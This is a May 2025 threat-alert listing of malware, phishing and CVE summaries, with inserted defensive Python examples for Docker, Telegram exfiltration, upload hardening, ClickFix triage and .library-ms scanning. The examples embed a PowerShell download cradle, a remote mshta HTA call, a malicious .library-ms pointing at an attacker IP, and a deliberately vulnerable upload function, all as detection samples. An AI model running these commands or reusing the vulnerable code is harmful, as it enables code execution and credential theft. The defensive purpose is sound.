ALERTS 2025 MAY
DATE | NAME | INFO | CATEGORY | SUBCATEGORY |
28.5.25 | AppleProcessHub infostealer for macOS | AppleProcessHub is the name of a new infostealer variant targeting the macOS platform and masquerading as a system process. | VIRUS | |
28.5.25 | Swan Vector APT campaign | A new APT campaign, dubbed "Swan Vector", has been targeting East Asian nations, particularly Japan and Taiwan. | APT | |
28.5.25 | StarFire Ransomware Demands $3,000 in Bitcoin | A group or individual calling themselves "StarFire" has recently emerged in the threat landscape, targeting individual machines with ransomware. | RANSOM | |
28.5.25 | DoubleLoader malware | DoubleLoader is a new malware family recently identified in the wild. Like other loaders, its main function is to retrieve malicious payloads from attacker-controlled servers and execute them on the compromised endpoints. | VIRUS | |
28.5.25 | Another fake CAPTCHA campaign leads to a range of stealers and RATs | Another campaign has been reported that uses fake CAPTCHA pages to trick users into executing malicious commands via the Windows Run dialog. | ALERTS | VIRUS |
23.5.25 | Vidar and StealC infostealers delivered via social engineering | A new campaign distributing Vidar and StealC infostealer variants has been reported by researchers from Trend Micro. The attackers use social engineering, in the form of TikTok videos, to entice users into running arbitrary PowerShell commands. | VIRUS | |
23.5.25 | Dero cryptominer delivered to vulnerable Docker containers | A new campaign delivering a Dero cryptocurrency miner to vulnerable Docker containers has been reported in the wild. Abusing exposed Docker APIs, the attackers inject two malware components named "nginx" and "cloud". The deployed cryptominer is written in Go and based on the open-source DeroHE CLI miner project. | CRYPTOCURRENCY | |
23.5.25 | TetraLoader distributed in the UAT-6382 campaign | According to a recent report from Cisco Talos, a new malicious activity cluster dubbed UAT-6382 has been delivering a new malware called TetraLoader to its victims. The attackers have been exploiting a Cityworks RCE vulnerability (CVE-2025-0994) to gain access to the targeted environments and perform initial reconnaissance. | VIRUS | |
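The Dero entry above turns on a single misconfiguration: a Docker Engine API listening on TCP with no authentication, which lets anyone who can reach the port start containers as root on the host. The script below is an added example for this page (not code from the campaign report or from Docker) that audits a daemon.json for that exposure. The two configurations it checks are constructed, and the key names assume the standard daemon.json format ("hosts", "tlsverify" and the "tls*" certificate paths).

```python
"""Audit a Docker daemon.json for an Engine API exposed over plain TCP.

Added example for this alerts page, not code from the Dero campaign or from
Docker. Assumes the standard daemon.json keys "hosts", "tlsverify" and the
"tls*" certificate paths; the two configurations below are constructed.
"""
import json

# Constructed: the weak setting the campaign preys on. Anyone who can reach
# port 2375 can run containers as root on the host, no credentials needed.
WEAK_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}
"""

# Constructed: the corrected setting. The API only answers to a client
# certificate signed by the CA, and only on the loopback interface.
HARDENED_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://127.0.0.1:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}
"""

# Bind addresses that mean "every interface", including the empty host form.
ALL_INTERFACES = {"", "0.0.0.0", "[::]", "::"}


def audit_daemon_config(text: str) -> list[str]:
    """Return one finding per problem on each tcp:// listener; empty means no exposure."""
    cfg = json.loads(text)
    tls_verify = bool(cfg.get("tlsverify"))
    findings = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// sockets are local to the host
        bind, _, port = host[len("tcp://"):].rpartition(":")
        if not tls_verify:
            findings.append(f"{host}: Engine API reachable without client-certificate verification")
        if bind in ALL_INTERFACES:
            findings.append(f"{host}: bound to all interfaces")
        if port == "2375":
            findings.append(f"{host}: port 2375 is the conventional unencrypted API port")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_daemon_config(text) or ["no exposed listener"])
```

The daemon can also be exposed by a -H tcp://... flag in its systemd unit rather than in daemon.json, so pair the file check with a look at the running dockerd command line and at which process owns ports 2375 and 2376.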
23.5.25 | Rhadamanthys delivered via phishing campaign | In a recently observed phishing campaign, we saw attackers attempting to deliver a Rhadamanthys stealer payload by way of a legal lure. Under the guise of a copyright infringement notification, the victim is encouraged to access a PDF for further details. | CAMPAIGN | |
22.5.25 | SideWinder APT using old Office vulnerabilities | A new cyber-espionage campaign by the APT group SideWinder has been targeting high-profile government institutions in Bangladesh, Pakistan, and Sri Lanka. The attackers pair spear-phishing lures with geofenced payloads so that only victims in specific countries receive the malicious content. The infection chain deploys the StealerBot malware by exploiting two old Office vulnerabilities in combination (CVE-2017-0199 and CVE-2017-11882). | ALERTS | APT |
23.5.25 | GhostSpy Android malware | GhostSpy is a mobile malware variant recently seen being actively distributed in the wild. Like other prevalent mobile malware strains, GhostSpy abuses Android Accessibility Services to sideload malicious .apk packages onto the targeted devices. | VIRUS | |
23.5.25 | Fake KeePass installers distributed in attacks targeting ESXi environments | KeePass is a popular open source password manager application. Recently there have been reports about an ongoing campaign distributing fake KeePass installers targeted at ESXi environments. | HACKING | |
23.5.25 | CVE-2024-7399 & CVE-2025-4632 - Samsung MagicINFO vulnerabilities | CVE-2024-7399 is an unauthenticated remote code execution (RCE) vulnerability affecting Samsung MagicINFO 9 Server. The flaw lets attackers upload malicious .jsp files via unauthenticated POST requests and thereby execute arbitrary OS commands. | VULNERABILITY | |
23.5.25 | Spoofed Japan e-Tax email notifications appear in phish runs | e-Tax is the National Tax Agency's online tax portal for filing tax returns and paying national taxes, including corporation tax. Recently, Symantec has observed phishing attempts mimicking e-Tax, enticing users to open fake notification emails. | PHISHING | |
23.5.25 | Malvertising lures victims to fake Kling AI website | Threat Actors use social media malvertising to lure victims to fake pages impersonating Kling AI platform. The campaign directs visitors to use the platform to create AI-generated images and videos. | AI | |
23.5.25 | Trojanized installer delivers Bumblebee loader | It was recently observed that the installer package for the RVTools application was trojanized with a Bumblebee loader DLL. RVTools is a free utility that collects and displays a wide range of information about virtual machines in VMware environments. | VIRUS | |
23.5.25 | Russia-Ukraine conflict comes into the picture in a new Binance phishing wave | Binance is one of the world's major cryptocurrency exchanges, allowing users to buy, sell and trade various digital assets, including Bitcoin, Ethereum, and altcoins. Lately, Symantec has observed phish runs that impersonate Binance services and entice users to open fake notification emails. | PHISHING | |
16.5.25 | Stealthy Shellcode loader executes Remcos RAT in Fileless Attack Chain | A sophisticated fileless malware campaign has been observed leveraging PowerShell to deploy the Remcos RAT. The attack begins with malicious LNK files embedded in ZIP archives, often masquerading as Office documents. These trigger obfuscated VBScript via mshta.exe leading to the in-memory execution of a PowerShell script. | VIRUS | |
16.5.25 | Earth Ammit cyber espionage campaigns | The Threat Actor known as Earth Ammit launched two distinct cyber espionage campaigns (dubbed VENOM and TIDRONE) across Central Asia, Southeast Asia, and Eastern Europe. These campaigns strategically target government entities and critical infrastructure - such as software service providers and upstream vendors across several critical sectors, including heavy industry, media, technology, healthcare, and military. | CAMPAIGN | |
16.5.25 | TransferLoader malware | TransferLoader is a newly identified malware loader active since February 2025, consisting of three components: a downloader, a backdoor and a backdoor loader. It uses advanced evasion techniques such as anti-debugging, runtime string decryption and junk code insertion to avoid detection and complicate reverse engineering. | VIRUS | |
16.5.25 | New DarkCloud malware uses AutoIt obfuscation in targeted attacks | According to a report published by Palo Alto Networks Unit 42, a new variant of the DarkCloud Stealer malware has been observed primarily targeting government organizations worldwide. The attack typically begins with phishing emails containing either a RAR archive or a PDF which prompts victims to download a malicious archive disguised as a software update. | VIRUS | |
16.5.25 | Chihuahua Stealer malware | Chihuahua Stealer is a new .NET-based infostealer distributed via a multi-staged campaign. The attackers leverage malicious documents hosted on the Google Drive repository and malicious PowerShell scripts to initiate the infection chain. The final payload - Chihuahua Stealer is delivered from a OneDrive repository path and has the functionality to collect and exfiltrate various sensitive data from the compromised endpoints including system information, data stored in the system web browsers, cryptocurrency wallet information, etc. | VIRUS | |
16.5.25 | PupkinStealer: A .NET-based Malware | PupkinStealer, a .NET-based malware has been observed being distributed via phishing emails containing malicious attachments or links. Targeting Windows users, the malware is capable of stealing sensitive data from Chromium-based browsers, Telegram, Discord, email clients, clipboard contents and more. The stolen data is compressed into a ZIP archive and exfiltrated using the Telegram Bot API. | VIRUS | |
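PupkinStealer (above) exfiltrates its ZIP archive through the Telegram Bot API, which means the stolen data leaves the network as ordinary HTTPS to api.telegram.org and the bot token sits in the URL path. The script below is an added example for this page, not code from the PupkinStealer report: it scans proxy log lines for Bot API calls, separates data-moving methods from reconnaissance ones, and groups victim hosts by bot so that one bot seen from many hosts is treated as one campaign. The log format (epoch, client IP, HTTP method, URL, status) and the bot token are constructed; a real token is a secret that lets anyone drive the bot, so handle it accordingly.

```python
"""Spot Telegram Bot API traffic in proxy logs and pull out the bot identity.

Added example for this alerts page, not code from the PupkinStealer report.
The log format (epoch, client IP, HTTP method, URL, status) and the bot
token below are constructed; real tokens must be handled as secrets.
"""
import re
from collections import defaultdict

# Bot API URLs carry bot<numeric id>:<secret> followed by the method name.
TELEGRAM_BOT_API = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{20,})/(?P<method>[A-Za-z]+)"
)

# Methods that move data out of the network; getMe/getUpdates are reconnaissance.
EXFIL_METHODS = {"sendDocument", "sendMessage", "sendPhoto", "sendVideo"}

# Constructed sample log: two hosts talking to the same bot, plus benign noise.
SAMPLE_PROXY_LOG = """\
1747900001 10.0.4.17 GET https://www.microsoft.com/en-us/ 200
1747900004 10.0.4.17 POST https://api.telegram.org/bot7123456789:AAFakeTokenForExampleOnly_00000000000/sendDocument 200
1747900009 10.0.4.23 POST https://api.telegram.org/bot7123456789:AAFakeTokenForExampleOnly_00000000000/sendMessage 200
1747900012 10.0.4.31 GET https://telegram.org/ 200
"""


def find_telegram_exfil(log_text: str) -> list[dict]:
    """Return one record per Bot API call, with the token masked for reporting."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        ts, client, _verb, url, _status = fields[:5]
        m = TELEGRAM_BOT_API.search(url)
        if not m:
            continue
        secret = m["secret"]
        hits.append({
            "time": int(ts),
            "client": client,
            "bot_id": m["bot_id"],
            "token_masked": f"{secret[:4]}...{secret[-4:]}",
            "method": m["method"],
            "exfil": m["method"] in EXFIL_METHODS,
        })
    return hits


def clients_per_bot(hits: list[dict]) -> dict[str, list[str]]:
    """Group victim hosts by bot id: one bot reached from many hosts is one campaign."""
    groups = defaultdict(set)
    for h in hits:
        groups[h["bot_id"]].add(h["client"])
    return {bot: sorted(clients) for bot, clients in groups.items()}


if __name__ == "__main__":
    found = find_telegram_exfil(SAMPLE_PROXY_LOG)
    for h in found:
        print(h)
    print(clients_per_bot(found))
```

Legitimate Telegram clients do not call api.telegram.org/bot..., so any match on a workstation is worth a ticket; the method name tells the responder whether data has already left (sendDocument) or the implant is still polling.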
13.5.25 | BTMOB RAT | According to recent reports, BTMOB RAT has resurfaced and now aims to steal Alipay PINs by mimicking the app’s interface. It spreads via phishing sites disguised as popular services and uses fake apps to lure victims. | VIRUS | |
13.5.25 | Noodlophile Stealer spread under the disguise of fake AI tools | An infostealing variant dubbed Noodlophile Stealer has recently been distributed in campaigns using AI video generator lures. The attackers advertise their fake AI platforms on social media. Users are first asked to upload photos or a video for the AI to enhance and are then served a download link for the supposedly edited content. | VIRUS | |
13.5.25 | Astryrean Stealer malware | Astryrean Stealer is a new Python-based infostealer recently identified in the wild. The malware targets collection and exfiltration of a wide variety of confidential or sensitive information including: compromised system information, data stored in system web browsers, Discord tokens or screenshots, among others. | VIRUS | |
13.5.25 | More_eggs served by Venom Spider | In a recent campaign the threat actor known as "Venom Spider" has been targeting corporate hiring managers and recruiters with a complex spear-phishing scheme that capitalizes on the need for such users to open email attachments or click on links to review an applicant's resume. | CAMPAIGN | |
9.5.25 | Earth Kasha threat actor targets Taiwan and Japan in a recent campaign | As recently reported by the researchers from Trend Micro, Earth Kasha threat group continues to target users in Taiwan and Japan. The attackers leverage a dropper malware dubbed RoamingMouse that comes in the form of a macro-enabled MS Excel file. | APT | |
9.5.25 | Deployment of RMM tools in malicious campaigns targeting Brazil | A new malicious campaign targeting users from Brazil has been reported by researchers from Cisco Talos. The attackers leverage a variety of commercial Remote Monitoring and Management (RMM) tools such as PDQ Connect and N-able remote access software. | VIRUS | |
9.5.25 | Mamona Ransomware | Mamona Ransomware is a newly discovered threat in the commodity ransomware landscape that operates entirely offline, with no external communication or data exfiltration. The malware uses custom encryption routines to encrypt user files, renaming them with the .HAes extension. | RANSOM | |
9.5.25 | Mail campaign delivers Java-based RAT | A malicious email campaign was recently observed targeting organizations in Italy, Portugal, and Spain. The campaign leveraged a Spanish email service provider to lend legitimacy to the emails, which contained a PDF attachment. | ||
9.5.25 | LZRD - the latest Mirai variant distributed in the wild | New campaigns distributing the Mirai botnet have been reported in the wild. The malware exploits two command injection vulnerabilities affecting GeoVision IoT devices that were disclosed last year, CVE-2024-6047 and CVE-2024-11120. | BOTNET | |
9.5.25 | CVE-2025-31324 - a critical SAP NetWeaver vulnerability | CVE-2025-31324 is a recently disclosed critical (CVSS score 10) unrestricted file upload vulnerability affecting SAP NetWeaver Visual Composer. | VULNERABILITY | |
9.5.25 | CVE-2025-32433 - Erlang/OTP SSH RCE vulnerability | CVE-2025-32433 is a recently disclosed Remote Code Execution (RCE) vulnerability affecting Erlang/OTP, a set of libraries for the Erlang programming language. If successfully exploited, the flaw may allow unauthenticated attackers to gain access to affected Erlang/OTP SSH servers and execute arbitrary commands. | VULNERABILITY | |
9.5.25 | Bert Ransomware | In April, a new ransomware actor known as "Bert" was observed operating in the wild and allegedly claimed several organizations as victims, including those in the Healthcare, Technology, and Event Services sectors across the US and Turkey. | RANSOM | |
9.5.25 | NETXLOADER - a new loader used by the Agenda ransomware group | In a recent report, details about a new malware loader named NETXLOADER have been shared. This loader, along with SmokeLoader, has been used in attacks perpetrated by the Agenda ransomware group. | VIRUS | |
9.5.25 | Threat Actors use Pahalgam attack in malicious campaign | In a strategic approach to exploiting current events, threat actors target Indian government personnel using decoy documents referencing the recent Pahalgam attack in a malicious campaign. | VIRUS | |
9.5.25 | FormBook malware distributed via weaponized Word Docs | A recent attack beginning with phishing emails containing malicious MS Word documents as attachments has been observed. Social engineering plays a part in luring users to click on the weaponized attached document. | VIRUS | |
9.5.25 | Balloonfly ransomware group leveraged 0-day in attack | The Symantec Threat Hunter team recently observed activity which can be attributed to the Balloonfly attack group. This group is typically responsible for distributing Play ransomware. | VULNERABILITY | |
9.5.25 | CVE-2025-34028: Commvault Command Center Path Traversal Vulnerability | CVE-2025-34028 is a critical path traversal vulnerability in the Commvault Command Center installation, enabling remote attackers to execute arbitrary code without authentication. | VULNERABILITY | |
9.5.25 | Notaires de France Impersonated in Telegram-based Phishing Campaign | Symantec has identified a credential phishing campaign leveraging malicious HTML files that mimic Notaires de France, the official body of state-appointed legal officers known as notaires, which serves as a central information hub for legal matters in France involving notarized acts. | PHISHING | |
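Three entries on this page (Samsung MagicINFO CVE-2024-7399, SAP NetWeaver Visual Composer CVE-2025-31324 and Commvault Command Center CVE-2025-34028) are the same bug class seen from different angles: an upload or file-write endpoint that trusts the client-supplied name, so a .jsp lands where the server will execute it, or "../" walks the write out of the intended directory. The block below is an added example for this page, not code from any of the three products: a deliberately vulnerable save-path function beside a hardened one that rejects rather than repairs bad names, requires the content to match the declared type, stores outside the web root, and re-checks the final path. The directory paths, allow-list and sample names are assumptions.

```python
"""Unrestricted file upload beside a hardened version of the same handler.

Added example for this alerts page; not code from Samsung MagicINFO, SAP
NetWeaver or Commvault. Paths, the allow-list and the sample inputs are
assumptions chosen to illustrate the bug class.
"""
import os
import re

WEB_ROOT = "/srv/app/webroot"      # assumption: served, and scripts executed, by the app server
UPLOAD_ROOT = "/srv/app/uploads"   # assumption: outside the web root, never executed
# One base name, exactly one extension, no separators: "pic.png.jsp" cannot match.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.[A-Za-z0-9]{1,5}$")

# Extension -> leading bytes the content must carry. Script types are absent on purpose.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".pdf": b"%PDF-",
}


def vulnerable_save_path(user_filename: str) -> str:
    """The bug in the three advisories: trust the client's name and write under the web root.
    'shell.jsp' becomes a server-executed page; '../' walks out of the directory."""
    return os.path.normpath(os.path.join(WEB_ROOT, "uploads", user_filename))


def hardened_save_path(user_filename: str, head: bytes) -> str:
    """Reject rather than sanitise: a name that needs repairing is an attack, not a typo."""
    if "/" in user_filename or "\\" in user_filename or "\x00" in user_filename:
        raise ValueError("path separators or NUL in filename")
    if not SAFE_NAME.match(user_filename):
        raise ValueError("filename outside the allowed pattern")
    ext = os.path.splitext(user_filename)[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None:
        raise ValueError(f"extension {ext} not allowed")
    if not head.startswith(magic):
        raise ValueError("content does not match the declared type")
    dest = os.path.normpath(os.path.join(UPLOAD_ROOT, user_filename))
    # Defence in depth: even after the checks above, confirm we are still inside the root.
    if os.path.commonpath([UPLOAD_ROOT, dest]) != UPLOAD_ROOT:
        raise ValueError("destination escapes the upload root")
    return dest


def is_accepted(user_filename: str, head: bytes) -> bool:
    """Convenience wrapper: True if the hardened handler would store the file."""
    try:
        hardened_save_path(user_filename, head)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed probes of the kind an attacker would send to an upload endpoint.
    for name, head in [("shell.jsp", b"<%@ page"), ("pic.png.jsp", b"\x89PNG\r\n\x1a\n"),
                       ("../../../etc/cron.d/job", b"* * * * *"), ("report.pdf", b"%PDF-1.7\n")]:
        print(f"{name!r:30} vulnerable -> {vulnerable_save_path(name)}  hardened -> {is_accepted(name, head)}")
```

The content check is deliberately limited to leading bytes: it stops a JSP or PHP body from hiding behind an image extension, but a polyglot file can still carry both. The reason the hardened version is safe regardless is the upload root itself, which the application server never executes from.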
9.5.25 | StealC V2: Enhanced capabilities | An enhanced version of the popular information stealer, StealC, has been observed. It features an upgraded control panel, a streamlined JSON-based C2 communication protocol and expanded payload delivery options including MSI packages and PowerShell scripts. | VIRUS | |
9.5.25 | TerraStealerV2 and TerraLogger malware families | Two new malware families, TerraStealerV2 and TerraLogger, have been reported in the wild and are associated with the financially motivated threat group Golden Chickens. | VIRUS | |
9.5.25 | Tax season targeted by modified Stealerium Infostealer | As U.S. tax day approaches, threat actors have been observed exploiting the season by distributing a modified version of the Stealerium infostealer through phishing emails. Malicious LNK files, disguised as tax-related documents like tax forms lure users into executing a Base64-encoded PowerShell script. | ALERTS | VIRUS |
2.5.25 | MintsLoader: The loader powering TAG-124’s targeted campaigns | MintsLoader, a sophisticated loader first observed in 2024, is extensively used by TAG-124, more than by any other threat actor to deploy malicious payloads such as GhostWeaver, StealC and a modified BOINC client. These attacks primarily target sectors including industrial, legal and energy. | VIRUS | |
2.5.25 | Discovery Bank Impersonated in FICA-Themed Smishing Scam | Discovery Bank, a well-known digital bank in South Africa, has had its brand abused by a group or individual in a recent smishing campaign aimed at harvesting mobile users' banking credentials. The attack begins with a malicious SMS that leverages FICA (Financial Intelligence Centre Act in South Africa) compliance as a lure. | PHISHING | |
2.5.25 | ClickFix social engineering tactic being used by various APT groups | ClickFix has gained traction in targeted espionage operations across multiple APT groups from North Korea, Iran, and Russia. This is a social engineering tactic where malicious websites impersonate legitimate software or document sharing platforms. | APT | |
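Four entries on this page share one telemetry signature: the fake CAPTCHA campaign (28.5.25), the Remcos fileless chain where a LNK in a ZIP launches mshta.exe which launches PowerShell (16.5.25), the tax-season Stealerium LNKs that run a Base64-encoded PowerShell script (9.5.25), and this ClickFix entry. In every case a script host starts under explorer.exe (the Run dialog or a double-clicked LNK) with an encoded command or download cradle, or PowerShell appears as a child of mshta.exe. The block below is an added example for this page, not detection content from any of the cited reports: it triages process-creation events of the shape Sysmon event ID 1 or EDR telemetry provides, decodes -EncodedCommand payloads so the analyst sees what was pasted, and leaves ordinary interactive and scheduled PowerShell alone. The events and the encoded command are constructed.

```python
"""Triage process-creation events for fake-CAPTCHA/ClickFix and LNK -> mshta -> PowerShell chains.

Added example for this alerts page, not detection content from any of the cited
reports. Event fields (parent, image, cmdline) mirror Sysmon event ID 1 / EDR
telemetry; the events and the encoded command below are constructed.
"""
import base64
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Download-and-run idioms that appear in pasted ClickFix commands and LNK payloads.
CRADLE = re.compile(
    r"invoke-expression|\biex\b|downloadstring|downloadfile|invoke-webrequest|\biwr\b|frombase64string",
    re.I,
)
# -e/-ec/-en/-enc/-EncodedCommand followed by a base64 blob.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str):
    """PowerShell -EncodedCommand is base64 over UTF-16LE text; return that text, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: dict) -> list[str]:
    """Return the reasons an event is suspicious; an empty list means leave it alone."""
    parent, image, cmd = event["parent"].lower(), event["image"].lower(), event["cmdline"]
    if image not in SCRIPT_HOSTS:
        return []
    reasons = []
    decoded = decode_encoded_command(cmd)
    if decoded:
        reasons.append("encoded command decodes to: " + decoded)
    text = cmd if decoded is None else cmd + " " + decoded
    if parent == "explorer.exe" and (decoded or CRADLE.search(text) or image == "mshta.exe"):
        reasons.append("script host started from Explorer (Run dialog / LNK) with cradle, "
                       "encoded command or HTA: fake-CAPTCHA / ClickFix pattern")
    if parent == "mshta.exe":
        reasons.append("child of mshta.exe: HTA-to-PowerShell chain")
    if CRADLE.search(text):
        reasons.append("download cradle in command line")
    return reasons


def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event that classify() flags."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]


# Constructed sample events. The encoded command is built here from CRADLE_TEXT.
CRADLE_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"
ENCODED = base64.b64encode(CRADLE_TEXT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    # 0: fake CAPTCHA, victim pastes the command into Win+R
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline": f"powershell -w hidden -enc {ENCODED}"},
    # 1: benign, user opens a console
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell.exe"},
    # 2: LNK from a ZIP runs an HTA via mshta
    {"parent": "explorer.exe", "image": "mshta.exe", "cmdline": r'mshta.exe "C:\Users\alice\AppData\Local\Temp\Invoice_Q2.hta"'},
    # 3: the HTA's VBScript launches in-memory PowerShell
    {"parent": "mshta.exe", "image": "powershell.exe", "cmdline": 'powershell -nop -w hidden -c "' + CRADLE_TEXT + '"'},
    # 4: benign, scheduled script
    {"parent": "cmd.exe", "image": "powershell.exe", "cmdline": r"powershell -File C:\scripts\backup.ps1"},
    # 5: ClickFix via Run dialog, mshta pulling a remote HTA
    {"parent": "explorer.exe", "image": "mshta.exe", "cmdline": "mshta https://verify-captcha.example/v.hta"},
]

if __name__ == "__main__":
    for index, reasons in triage(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["cmdline"][:60])
        for r in reasons:
            print("   -", r)
```

On a real estate the first rule (explorer.exe parent) is the one to tune: developers do open PowerShell from Explorer, which is why the rule fires only when the command line also carries a cradle, an encoded blob or mshta, not on the launch alone.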
2.5.25 | Iranian threat actor targeted critical Middle Eastern infrastructure | Researchers at Fortinet have recently published their investigation into an Iranian threat actor's attack against critical infrastructure in the Middle East. | APT | |
2.5.25 | Spear phishing campaign targets WUC with trojanized Uyghur Text Editor | A spear phishing campaign delivering surveillance malware to high-profile members of the World Uyghur Congress (WUC) has been reported. As part of the attack, a trojanized version of a legitimate Uyghur-language text editor is used to gain remote access, collect system information, and manipulate files. | PHISHING | |
2.5.25 | Pentagon Stealer | Pentagon Stealer is a recently identified malware strain built using both Python and Golang, engineered to exfiltrate a broad array of sensitive information. It primarily targets browser credentials, cookies, cryptocurrency wallet data and authentication tokens from apps like Discord and Telegram. | VIRUS | |
2.5.25 | Hannibal Infostealer | Hannibal Infostealer is a sophisticated malware observed in the wild, rebranded from the Sharp and TX stealer families. Developed in C#, it targets both Chromium and Gecko-based browsers, extracting sensitive data while bypassing browser protection. | VIRUS | |
2.5.25 | TypeLib hijacking via Teams | A Microsoft Teams phishing campaign was found to spread a unique PowerShell backdoor in recent attacks. The Threat Actor known as Storm-1811 initiates the attack by employing social engineering tricks on a targeted employee via Microsoft Teams chat, posing as internal IT support staff. | PHISHING | |
2.5.25 | Gremlin Stealer | Gremlin Stealer is a new C#-based malware variant recently discovered by the researchers from Palo Alto. Gremlin Stealer is currently advertised for sale via Telegram channels. | VIRUS | |
2.5.25 | CVE-2025-24054 - NTLM vulnerability exploited in the wild | CVE-2025-24054 is a recently disclosed NTLM (New Technology LAN Manager) hash disclosure vulnerability exploited via spoofing. Using crafted .library-ms files, an unauthorized attacker may be able to perform spoofing over the network. | ALERTS | VULNERABILITY |
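A .library-ms file is plain XML describing a Windows Library, and its search connectors may point at a UNC path or a WebDAV URL. Explorer resolves those locations when it renders the file, so a remote entry produces an outbound SMB or WebDAV connection carrying NTLM authentication to a host the attacker controls; that is the leak the entry above refers to. The parser below is an added example for this page, not code from the advisory: it walks the documented Library Description schema and reports every connector that points off the machine, which is enough to quarantine such files at the mail gateway. Both sample files are constructed; local folder paths and knownfolder: references are normal and are ignored.

```python
"""Flag .library-ms files whose search connectors point at remote locations.

Added example for this alerts page, not code from the CVE-2025-24054 advisory.
The two files below are constructed; element names follow the documented
Windows Library Description schema, namespace
http://schemas.microsoft.com/windows/2009/library.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

NS = "{http://schemas.microsoft.com/windows/2009/library}"

# Constructed: one UNC and one WebDAV connector, both to an attacker host.
MALICIOUS_LIBRARY_MS = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1002</iconReference>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>\\203.0.113.9\documents</url>
      </simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation>
        <url>http://203.0.113.9/documents</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# Constructed: what a normal user library looks like (local path and known folder).
BENIGN_LIBRARY_MS = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>C:\Users\alice\Documents</url>
      </simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def remote_locations(xml_doc) -> list[dict]:
    """Return every <url> that would make Explorer reach out over SMB (UNC) or WebDAV (http[s])."""
    data = xml_doc.encode("utf-8") if isinstance(xml_doc, str) else xml_doc
    # For files taken from untrusted mail, parse with defusedxml.ElementTree instead.
    root = ET.fromstring(data)
    hits = []
    for url_el in root.iter(NS + "url"):
        url = (url_el.text or "").strip()
        if url.startswith("\\\\"):
            hits.append({"url": url, "kind": "UNC", "host": url[2:].split("\\", 1)[0]})
        elif url.lower().startswith(("http://", "https://")):
            hits.append({"url": url, "kind": "WebDAV", "host": urlparse(url).hostname})
    return hits


if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_LIBRARY_MS), ("benign", BENIGN_LIBRARY_MS)):
        print(label, remote_locations(doc))
```

Patching closes this particular trigger, but the outbound NTLM authentication is the durable problem: blocking TCP 445 and WebDAV egress at the perimeter and enforcing NTLM auditing or restriction via policy removes the payoff for the whole family of "file that makes Explorer connect somewhere" lures.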